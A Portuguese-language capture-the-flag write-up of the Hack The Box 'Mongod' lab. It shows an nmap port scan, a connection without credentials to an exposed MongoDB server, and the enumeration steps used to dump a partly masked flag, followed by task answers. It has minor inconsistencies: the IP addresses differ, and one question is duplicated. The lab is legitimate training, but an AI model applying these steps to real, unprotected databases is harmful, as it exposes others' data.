Fala Rapaziada, beleza?
Hoje vou trazer a resolução do Laboratório Mongod do Starting point do HTB.
Capture to Flag
Primeiro, rodei o nmap para descobrir as portas abertas.
Vou focar na porta 27017 que está rodando um MongoDB na versão 3.6.8
nmap -sSV -p- -Pn 10.129.8.113 --min-rate=1000
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-24 10:00 EST
Nmap scan report for 10.129.8.113
Host is up (0.19s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
27017/tcp open mongodb MongoDB 3.6.8
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.64 seconds
Após localizar a porta aberto, precisei acessar o banco de dados, para isso é preciso realizar a instalação do mongodb.
apt-get install mongodb
Com ele instalado, agora posso fazer a conexão ao banco, que nesse caso não precisou de usuário e senha para autenticação.
mongo 10.129.61.2
MongoDB shell version v6.0.1
connecting to: mongodb://10.129.61.2:27017/test?compressors=disabled&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("f5d776e4-6bb0-42a2-a31b-92c29982da74") }
MongoDB server version: 3.6.8
WARNING: shell and server versions do not match
================
Warning: the "mongo" shell has been superseded by "mongosh",
which delivers improved usability and compatibility.The "mongo" shell has been deprecated and will be removed in
an upcoming release.
For installation instructions, see
https://docs.mongodb.com/mongodb-shell/install/
================
---
The server generated these startup warnings when booting:
2023-03-27T18:34:09.245+0000 I STORAGE [initandlisten]
2023-03-27T18:34:09.245+0000 I STORAGE [initandlisten] ** WARNING: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine
2023-03-27T18:34:09.245+0000 I STORAGE [initandlisten] ** See http://dochub.mongodb.org/core/prodnotes-filesystem
2023-03-27T18:34:12.276+0000 I CONTROL [initandlisten]
2023-03-27T18:34:12.276+0000 I CONTROL [initandlisten] ** WARNING: Access control is not enabled for the database.
2023-03-27T18:34:12.276+0000 I CONTROL [initandlisten] ** Read and write access to data and configuration is unrestricted.
2023-03-27T18:34:12.276+0000 I CONTROL [initandlisten]
---
>
Com o comando show dbs, consegui ver o nome de todas as bases de dados.
> show dbs
admin 0.000GB
config 0.000GB
local 0.000GB
sensitive_information 0.000GB
users 0.000GB
Com o comando use sensitive_information, acessei a base sensitive_information
> use sensitive_information
switched to db sensitive_information
com o comando show collections, consegui verificar o nome das coleção flag, a única contida nessa base
> show collections
flag
Para conseguir ver o conteúdo da coleção de forma mais “amigável”, usei o comando db.flag.find().pretty()
> db.flag.find().pretty()
{
"_id" : ObjectId("630e3dbcb82540ebbd1748c5"),
"flag" : "1b6e6fb359e7c4024XXXXXXXXXXXXX"
}
>
Tarefas
TASK 1 – How many TCP ports are open on the machine?
R: 2
TASK 2 – Which service is running on port 27017 of the remote host?
R: MongoDB 3.6.8
TASK 3 – What type of database is MongoDB? (Choose: SQL or NoSQL)
R: NoSQL
TASK 4 – What is the command name for the Mongo shell that is installed with the mongodb-clients package?
R: mongo
TASK 5 – What is the command used for listing out the collections in a database? (No need to include a trailing)
R: show dbs
TASK 6 – What is the command used for listing out the collections in a database? (No need to include a trailing)
R: show collections
TASK 7 – What is the command used for dumping the content of all the documents within the collection named flag in a format that is easy to read?
R: db.flag.find().pretty()
SUBMIT FLAG – Submit root flag
R: 1b6e6fb359e7c4024XXXXXXXXXXX
Seja o primeiro a comentar